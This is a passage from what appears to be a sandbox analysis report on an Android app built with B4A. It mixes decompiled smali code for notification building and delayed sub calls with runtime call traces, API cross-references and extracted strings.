                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Object@548b7b3
                        • Time: 697332
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvvv4
                            • getName:_vvvvvvvvv4
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.String@2771ce9
                        • Time: 697333
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvvv5
                            • getName:_vvvvvvvvv5
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.String@b8d1c0f
                        • Time: 697502
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv0
                            • getName:_vvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • ""
                        • Time: 697504
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv2
                            • getName:_vvvvvvvv2
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • ht
                        • Time: 697519
                          • This:
                            • public boolean com.MrXnxVip.global.httpjob._vvvvvvvv3
                            • getName:_vvvvvvvv3
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • false
                        • Time: 697634
                          • This:
                            • public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvv7
                            • getName:_vvvvvvvv7
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • class com.MrXnxVip.global.firebasemessaging
                            • getName: com.MrXnxVip.global.firebasemessaging
                        • Time: 697670
                          • This:
                            • public com.MrXnxVip.global.firebasemessaging com.MrXnxVip.global.httpjob._vvvvvvvvv0
                            • getName:_vvvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • null
                        • Time: 697679
                          • This:
                            • public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest com.MrXnxVip.global.httpjob._vvvvvvvvv1
                            • getName:_vvvvvvvvv1
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@2e13fb4
                        • Time: 697693
                          • This:
                            • public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse com.MrXnxVip.global.httpjob._vvvvvvvvv2
                            • getName:_vvvvvvvvv2
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@37564d9
                        • Time: 697705
                          • This:
                            • public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvvv3
                            • getName:_vvvvvvvvv3
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Object@d08d14c
                        • Time: 697717
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvvv4
                            • getName:_vvvvvvvvv4
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.String@2771ce9
                        • 14 additional calls hidden ...
                        53goto/16 :goto_10f
                        54goto_42:
                        55iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Component:Ljava/lang/Object;
                        56instance-of v1, v1, Lanywheresoftware/b4a/B4AClass;
                        57if-eqz v1, :cond_5c
                        58new-instance v0, Ljava/lang/StringBuilder;
                        60const-string v1, "Object context is paused. Ignoring CallSubDelayed: "
                        62invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        64iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Sub:Ljava/lang/String;
                        66invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        68invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        69move-result-object v0
                        71invoke-static {v0}, Lanywheresoftware/b4a/keywords/Common;->Log(Ljava/lang/String;)V
                        72return-void
                        73cond_5c:
                        74iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$mine:Lanywheresoftware/b4a/BA;
                        76iget-object v2, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Component:Ljava/lang/Object;
                        78invoke-static {v1, v2}, Lanywheresoftware/b4a/keywords/Common;->getComponentIntent(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)Landroid/content/Intent;
                        79move-result-object v1
                        81invoke-virtual {v1}, Landroid/content/Intent;->getComponent()Landroid/content/ComponentName;
                        82move-result-object v1
                        83if-nez v1, :cond_70
                        85const-string v0, "ComponentName = null"
                        87invoke-static {v0}, Lanywheresoftware/b4a/keywords/Common;->Log(Ljava/lang/String;)V
                        88return-void
                        89cond_70:
                        90invoke-virtual {v1}, Landroid/content/ComponentName;->getClassName()Ljava/lang/String;
                        91move-result-object v2
                        93invoke-static {v2}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 695736
                          • p0: com.MrXnxVip.global.httputils2service
                          • Return:
                            • class com.MrXnxVip.global.httputils2service
                            • getName: com.MrXnxVip.global.httputils2service
                        • Time: 700210
                          • p0: com.MrXnxVip.global.main
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        94move-result-object v2
                        96const-string v3, "mostCurrent"
                        98invoke-virtual {v2, v3}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        • Time: 695737
                          • This:
                            • class com.MrXnxVip.global.httputils2service
                            • getName:com.MrXnxVip.global.httputils2service
                          • p0: mostCurrent
                          • Return:
                            • static com.MrXnxVip.global.httputils2service com.MrXnxVip.global.httputils2service.mostCurrent
                            • getName: mostCurrent
                        • Time: 700214
                          • This:
                            • class com.MrXnxVip.global.main
                            • getName:com.MrXnxVip.global.main
                          • p0: mostCurrent
                          • Return:
                            • public static com.MrXnxVip.global.main com.MrXnxVip.global.main.mostCurrent
                            • getName: mostCurrent
                        99move-result-object v3
                        100const/4 v4, 0x1
                        102invoke-virtual {v3, v4}, Ljava/lang/reflect/Field;->setAccessible(Z)V
                        103const/4 v6, 0x0
                        105invoke-virtual {v3, v6}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 695738
                          • This:
                            • static com.MrXnxVip.global.httputils2service com.MrXnxVip.global.httputils2service.mostCurrent
                            • getName:mostCurrent
                          • p0: null
                          • Return:
                            • null
                        106move-result-object v3
                        107if-nez v3, :cond_cd
                        108iget v3, p0, Lanywheresoftware/b4a/keywords/Common$12;->retries:I
                        109const/4 v6, 0x5
                        110if-ne v3, v6, :cond_cd
                        111const-class v3, Landroid/app/Activity;
                        113invoke-virtual {v3, v2}, Ljava/lang/Class;->isAssignableFrom(Ljava/lang/Class;)Z
                        114move-result v3
                        115if-eqz v3, :cond_a8
                        117invoke-static {}, Lanywheresoftware/b4a/BA;->isAnyActivityVisible()Z
                        • Time: 700216
                          • p0: com.MrXnxVip.global.main
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        • Reflective invoke: com.MrXnxVip.global.main.isAnyActivityVisible
                          • Return:
                            • false
                        • Time: 700219
                          • This:
                            • public static boolean com.MrXnxVip.global.main.isAnyActivityVisible()
                            • getName:isAnyActivityVisible
                          • p0: null
                          • p1: null
                          • Return:
                            • false
                        118move-result v2
                        119if-eqz v2, :cond_a4
                        121iget-object v2, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$mine:Lanywheresoftware/b4a/BA;
                        123iget-object v3, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Component:Ljava/lang/Object;
                        125invoke-static {v2, v3}, Lanywheresoftware/b4a/keywords/Common;->StartActivity(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        126goto/16 :goto_cd
                        127cond_a4: const/4 v2, 0x0
                        128iput v2, p0, Lanywheresoftware/b4a/keywords/Common$12;->retries:I
                        129goto/16 :goto_cd
                        130cond_a8: const-class v3, Landroid/app/Service;
                        132invoke-virtual {v3, v2}, Ljava/lang/Class;->isAssignableFrom(Ljava/lang/Class;)Z
                        133move-result v3
                        134if-eqz v3, :cond_b8
                        136iget-object v2, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$mine:Lanywheresoftware/b4a/BA;
                        138iget-object v3, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Component:Ljava/lang/Object;
                        140invoke-static {v2, v3}, Lanywheresoftware/b4a/keywords/Common;->StartService(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        141goto/16 :goto_cd
                        142cond_b8: const-class v3, Landroid/content/BroadcastReceiver;
                        144invoke-virtual {v3, v2}, Ljava/lang/Class;->isAssignableFrom(Ljava/lang/Class;)Z
                        145move-result v2
                        146if-eqz v2, :cond_cd
                        148sget-object v2, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        150iget-object v3, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$mine:Lanywheresoftware/b4a/BA;
                        152iget-object v6, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Component:Ljava/lang/Object;
                        154invoke-static {v3, v6}, Lanywheresoftware/b4a/keywords/Common;->getComponentIntent(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)Landroid/content/Intent;
                        155move-result-object v3
                        157invoke-virtual {v2, v3}, Landroid/app/Application;->sendBroadcast(Landroid/content/Intent;)V
                        • Time: 695740
                          • This:
                            • android.app.Application@feb8753
                          • intent: Intent { cmp=com.MrXnxVip.global/.httputils2service }
                        158goto_cd: iget v2, p0, Lanywheresoftware/b4a/keywords/Common$12;->retries:I
                        159sub-int/2addr v2, v4
                        160iput v2, p0, Lanywheresoftware/b4a/keywords/Common$12;->retries:I
                        161if-lez v2, :cond_dc
                        163sget-object v0, Lanywheresoftware/b4a/BA;->handler:Landroid/os/Handler;
                        164const-wide/16 v1, 0x64
                        166invoke-virtual {v0, p0, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
                        167goto/16 :goto_10f
                        168cond_dc: if-eqz v0, :cond_fe
                        169new-instance v1, Lanywheresoftware/b4a/keywords/Common$12$1;
                        171iget-object v6, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Sub:Ljava/lang/String;
                        173iget-object v7, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Arguments:[Ljava/lang/Object;
                        174move-object v2, v1
                        175move-object v3, p0
                        176move-object v4, v0
                        178invoke-direct/range {v2 .. v7}, Lanywheresoftware/b4a/keywords/Common$12$1;-><init>(Lanywheresoftware/b4a/keywords/Common$12;Lanywheresoftware/b4a/BA;Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)V
                        179new-instance v2, Ljava/lang/StringBuilder;
                        181const-string v3, "CallSubDelayed - "
                        183invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        185iget-object v3, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Sub:Ljava/lang/String;
                        187invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        189invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        190move-result-object v2
                        192invoke-virtual {v0, v2, v1}, Lanywheresoftware/b4a/BA;->addMessageToPausedMessageQueue(Ljava/lang/String;Ljava/lang/Runnable;)V
                        193goto/16 :goto_10f
                        194cond_fe:
                        195invoke-virtual {v1}, Landroid/content/ComponentName;->getClassName()Ljava/lang/String;
                        196move-result-object v0
                        198iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Sub:Ljava/lang/String;
                        200sget-object v2, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        202invoke-virtual {v1, v2}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        203move-result-object v1
                        205iget-object v2, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Arguments:[Ljava/lang/Object;
                        207invoke-static {v0, v1, v5, v2}, Lanywheresoftware/b4a/BA;->addMessageToUninitializeActivity(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Object;[Ljava/lang/Object;)V
                        208goto_10f: return-void
                        209catch_110: move-exception v0
                        210new-instance v1, Ljava/lang/RuntimeException;
                        212invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        213throw v1
                        Cross References
                        APIs
                        • android.content.Intent.addFlags
                        • android.content.Intent.addFlags
                        • android.content.Intent.putExtra
                        • android.app.PendingIntent.getActivity
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.app.Notification$Builder.<init>
                        • android.app.NotificationChannel.<init>
                        • android.app.Application.getSystemService
                        • android.app.NotificationManager.createNotificationChannel
                        • java.lang.RuntimeException.<init>
                        • android.app.Notification$Builder.<init>
                        • android.app.Notification$Builder.setContentTitle
                        • android.app.Notification$Builder.setContentText
                        • android.app.Notification$Builder.setContentIntent
                        • android.app.Notification$Builder.build
                        • java.lang.System.currentTimeMillis
                        • android.app.Notification.extras:Landroid/os/Bundle
                        • android.os.Bundle.putBoolean
                        • android.app.Notification.<init>
                        • java.lang.System.currentTimeMillis
                        • java.lang.Class.getDeclaredMethod
                        • java.lang.reflect.Method.invoke
                        • java.lang.RuntimeException.<init>
                        Strings
                        • Notification_Tag
                        • channel_
                        • com.MrXnxVip.global
                        • notification
                        • android.showWhen
                        • setLatestEventInfo
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/ClassNotFoundException;
                        3}
                        4.end annotation
                        6invoke-static {p1, p5}, Lanywheresoftware/b4a/keywords/Common;->getComponentIntent(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)Landroid/content/Intent;
                        7move-result-object p5
                        8const/high16 v0, 0x10000000
                        10invoke-virtual {p5, v0}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        11const/high16 v0, 0x20000
                        13invoke-virtual {p5, v0}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        14if-eqz p4, :cond_15
                        16const-string v0, "Notification_Tag"
                        18invoke-virtual {p5, v0, p4}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/CharSequence;)Landroid/content/Intent;
                        19cond_15: const/high16 v0, 0x8000000
                        20sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
                        21const/16 v2, 0x1f
                        22if-lt v1, v2, :cond_1f
                        23const/high16 v0, 0xc000000
                        24cond_1f:
                        25iget-object v1, p1, Lanywheresoftware/b4a/BA;->context:Landroid/content/Context;
                        26const/4 v2, 0x0
                        27if-nez p4, :cond_26
                        28const/4 p4, 0x0
                        29goto/16 :goto_2c
                        30cond_26: sget p4, Lanywheresoftware/b4a/objects/NotificationWrapper;->pendingId:I
                        31add-int/lit8 v3, p4, 0x1
                        32sput v3, Lanywheresoftware/b4a/objects/NotificationWrapper;->pendingId:I
                        33goto_2c:
                        34invoke-static {v1, p4, p5, v0}, Landroid/app/PendingIntent;->getActivity(Landroid/content/Context;ILandroid/content/Intent;I)Landroid/app/PendingIntent;
                        35move-result-object p4
                        37invoke-direct {p0}, Lanywheresoftware/b4a/objects/NotificationWrapper;->getND()Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;
                        38move-result-object p5
                        39sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        40const/16 v1, 0x13
                        41const/4 v3, 0x1
                        42if-lt v0, v1, :cond_ae
                        43sget p1, Landroid/os/Build$VERSION;->SDK_INT:I
                        44const/16 v0, 0x1a
                        45if-lt p1, v0, :cond_7a
                        46try_start_41: new-instance p1, Ljava/lang/StringBuilder;
                        48const-string v0, "channel_"
                        50invoke-direct {p1, v0}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        51iget v0, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->importanceLevel:I
                        53invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        55invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        56move-result-object p1
                        57new-instance v0, Landroid/app/Notification$Builder;
                        59sget-object v1, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        61invoke-direct {v0, v1, p1}, Landroid/app/Notification$Builder;-><init>(Landroid/content/Context;Ljava/lang/String;)V
                        62new-instance v1, Landroid/app/NotificationChannel;
                        64sget-object v2, Lanywheresoftware/b4a/keywords/Common;->Application:Lanywheresoftware/b4a/keywords/B4AApplication;
                        66invoke-static {}, Lanywheresoftware/b4a/keywords/B4AApplication;->getLabelName()Ljava/lang/String;
                        • Time: 688239
                          • This:
                            • android.app.ApplicationPackageManager@7c3e79
                          • packageName: com.MrXnxVip.global
                          • flags: 0
                          • Return:
                            • ApplicationInfo{ce3217 com.MrXnxVip.global}
                        • Time: 688240
                          • Return:
                            • seq
                        • Time: 812130
                          • This:
                            • android.app.ApplicationPackageManager@7c3e79
                          • packageName: com.MrXnxVip.global
                          • flags: 0
                          • Return:
                            • ApplicationInfo{4652d2 com.MrXnxVip.global}
                        • Time: 824540
                          • This:
                            • android.app.ApplicationPackageManager@74669ed
                          • packageName: com.MrXnxVip.global
                          • flags: 0
                          • Return:
                            • ApplicationInfo{11e8585 com.MrXnxVip.global}
                        67move-result-object v2
                        68iget v4, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->importanceLevel:I
                        70invoke-direct {v1, p1, v2, v4}, Landroid/app/NotificationChannel;-><init>(Ljava/lang/String;Ljava/lang/CharSequence;I)V
                        72sget-object p1, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        74const-string v2, "notification"
                        76invoke-virtual {p1, v2}, Landroid/app/Application;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        • Time: 688245
                          • This:
                            • android.app.Application@feb8753
                          • name: notification
                          • Return:
                            • android.app.NotificationManager@740e9cd
                        • Time: 824544
                          • This:
                            • android.app.Application@e983b42
                          • name: notification
                          • Return:
                            • android.app.NotificationManager@bc223c8
                        77move-result-object p1
                        78check-cast p1, Landroid/app/NotificationManager;
                        80invoke-virtual {p1, v1}, Landroid/app/NotificationManager;->createNotificationChannel(Landroid/app/NotificationChannel;)V
                        81try_end_72: goto/16 :goto_81
                        82catch_73: move-exception p1
                        83new-instance p2, Ljava/lang/RuntimeException;
                        85invoke-direct {p2, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        86throw p2
                        87cond_7a: new-instance v0, Landroid/app/Notification$Builder;
                        89sget-object p1, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        91invoke-direct {v0, p1}, Landroid/app/Notification$Builder;-><init>(Landroid/content/Context;)V
                        92goto_81:
                        93invoke-virtual {v0, p2}, Landroid/app/Notification$Builder;->setContentTitle(Ljava/lang/CharSequence;)Landroid/app/Notification$Builder;
                        94move-result-object p1
                        96invoke-virtual {p1, p3}, Landroid/app/Notification$Builder;->setContentText(Ljava/lang/CharSequence;)Landroid/app/Notification$Builder;
                        97move-result-object p1
                        99invoke-virtual {p1, p4}, Landroid/app/Notification$Builder;->setContentIntent(Landroid/app/PendingIntent;)Landroid/app/Notification$Builder;
                        101invoke-virtual {v0}, Landroid/app/Notification$Builder;->build()Landroid/app/Notification;
                        102move-result-object p1
                        103iget p2, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->defaults:I
                        104iput p2, p1, Landroid/app/Notification;->defaults:I
                        105iget p2, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->flags:I
                        106iput p2, p1, Landroid/app/Notification;->flags:I
                        107iget p2, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->icon:I
                        108iput p2, p1, Landroid/app/Notification;->icon:I
                        110invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        111move-result-wide p2
                        112iput-wide p2, p1, Landroid/app/Notification;->when:J
                        113iget p2, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->number:I
                        114iput p2, p1, Landroid/app/Notification;->number:I
                        116iget-object p2, p1, Landroid/app/Notification;->extras:Landroid/os/Bundle;
                        118const-string p3, "android.showWhen"
                        120invoke-virtual {p2, p3, v3}, Landroid/os/Bundle;->putBoolean(Ljava/lang/String;Z)V
                        121goto/16 :goto_fe
                        122cond_ae: new-instance v0, Landroid/app/Notification;
                        124invoke-direct {v0}, Landroid/app/Notification;-><init>()V
                        125iget v1, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->defaults:I
                        126iput v1, v0, Landroid/app/Notification;->defaults:I
                        127iget v1, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->flags:I
                        128iput v1, v0, Landroid/app/Notification;->flags:I
                        129iget v1, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->icon:I
                        130iput v1, v0, Landroid/app/Notification;->icon:I
                        132invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        133move-result-wide v4
                        134iput-wide v4, v0, Landroid/app/Notification;->when:J
                        135iget p5, p5, Lanywheresoftware/b4a/objects/NotificationWrapper$NotificationData;->number:I
                        136iput p5, v0, Landroid/app/Notification;->number:I
                        137try_start_c9:
                        138sget-object p5, Lanywheresoftware/b4a/objects/NotificationWrapper;->methodSetLastEvent:Ljava/lang/reflect/Method;
                        139const/4 v1, 0x3
                        140const/4 v4, 0x2
                        141const/4 v5, 0x4
                        142if-nez p5, :cond_ec
                        143const-class p5, Landroid/app/Notification;
                        145const-string v6, "setLatestEventInfo"
                        146new-array v7, v5, [Ljava/lang/Class;
                        147const-class v8, Landroid/content/Context;
                        148aput-object v8, v7, v2
                        149const-class v8, Ljava/lang/CharSequence;
                        150aput-object v8, v7, v3
                        151const-class v8, Ljava/lang/CharSequence;
                        152aput-object v8, v7, v4
                        153const-class v8, Landroid/app/PendingIntent;
                        154aput-object v8, v7, v1
                        156invoke-virtual {p5, v6, v7}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        157move-result-object p5
                        158sput-object p5, Lanywheresoftware/b4a/objects/NotificationWrapper;->methodSetLastEvent:Ljava/lang/reflect/Method;
                        159cond_ec:
                        160sget-object p5, Lanywheresoftware/b4a/objects/NotificationWrapper;->methodSetLastEvent:Ljava/lang/reflect/Method;
                        161new-array v5, v5, [Ljava/lang/Object;
                        163iget-object p1, p1, Lanywheresoftware/b4a/BA;->context:Landroid/content/Context;
                        164aput-object p1, v5, v2
                        165aput-object p2, v5, v3
                        166aput-object p3, v5, v4
                        167aput-object p4, v5, v1
                        169invoke-virtual {p5, v0, v5}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        170try_end_fd: move-object p1, v0
                        171goto_fe:
                        172invoke-virtual {p0, p1}, Lanywheresoftware/b4a/objects/NotificationWrapper;->setObject(Ljava/lang/Object;)V
                        173return-void
                        174catch_102: move-exception p1
                        175new-instance p2, Ljava/lang/RuntimeException;
                        177invoke-direct {p2, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        178throw p2
                        APIs
                        • com.MrXnxVip.global.httputils2service.processBA:Lanywheresoftware/b4a/BA
                        • anywheresoftware.b4a.BA$SharedProcessBA$ModuleType.RECEIVER:Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType
                        • com.MrXnxVip.global.httputils2service.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.StringBuilder.<init>
                        • android.app.Application.getPackageName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
